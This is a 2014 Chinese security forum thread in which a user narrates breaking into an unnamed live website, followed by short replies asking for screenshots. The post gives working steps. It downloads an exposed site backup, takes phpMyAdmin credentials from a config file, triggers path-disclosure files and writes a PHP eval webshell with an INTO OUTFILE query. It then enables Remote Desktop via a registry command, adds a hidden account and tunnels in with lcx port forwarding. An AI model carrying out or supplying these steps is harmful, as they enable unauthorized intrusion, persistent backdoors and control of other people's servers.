蟹老板 发表于 2014-11-24 14:12:24

一次无技术含量的过程,利用网站备份包可下载

目标站这里就不说域名了。我习惯性的扔wvs里面扫扫,结果就扫出来了个web.zip

我访问了一下可以下载。再看一下文件大小,七百多M。   估计是整站!

下载完打开看一下,和网站基本一样,应该是最近刚备份的。那就顺利了!
这个网站很乱,好几个目录,各种bbs,cms。还有uc_server,phpmyadmin。要是一个个的试,会走不少弯路。
我截断上传不解析的弯路就不提了直接说重点。
压缩包到手,先别急着去利用,先翻翻目录。仔细看看,然后我就在一个/bbs/xue/的目录下找到了个phpmyadmin
在目录里翻翻密码文件 一般在inc/config.inc.php里面。

登陆phpmyadmin成功
这里就可以利用它来拿shell了。
先爆路径。访问下面两个文件试试
/phpmyadmin/libraries/lect_lang.lib.php
/phpmyadmin/themes/darkblue_orange/layout.inc.php
爆出来了 然后执行语句
select '<?php @eval($_POST);?>'INTO OUTFILE '爆出的路径/phpmyadmin/m.php'
菜刀链接之。


一路下来都很顺利,然后我就想这个网站安全做的很差,结果真是这样。菜刀上去whoami。直接system权限。
查看一下端口   没开3389。用cmd命令试试
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
然后再查看端口,3389开了。
创建了一个带$用户远程连接一下。连接不上。   是内网。
这里就用lcx转发一下吧
本机: lcx -listen 2222 3333
2222为转发端口,3333为本机任意未被占用的端口
服务器:lcx -slave 本机IP 2222 127.0.0.1 3389
然后访问远程桌面127.0.0.1:3333
成功进去了。
可以说是一个压缩包印发的渗透。千万别忽视网络安全。

C4r1st 发表于 2014-11-24 14:37:51

细节不够。细节的截图一个没有,结果的截图是有两个。

蟹老板 发表于 2014-11-24 15:29:44

C4r1st 发表于 2014-11-24 14:37
细节不够。细节的截图一个没有,结果的截图是有两个。

因为没什么技术含量文字完全就写出细节了。

ylyl60 发表于 2014-11-24 16:51:02

还想再多看看呢 没什么内容

君之御林 发表于 2014-11-24 17:12:56

屌:P屌:P屌:P屌:P屌:P屌:P屌:P屌:P屌:P屌:P屌:P屌:P屌:P屌:P屌:P屌:P屌:P屌:P屌:P屌:P屌:P屌:P屌:P

super 发表于 2014-11-25 12:10:12

.....希望看到细节
页: [1]
查看完整版本: 一次无技术含量的过程,利用网站备份包可下载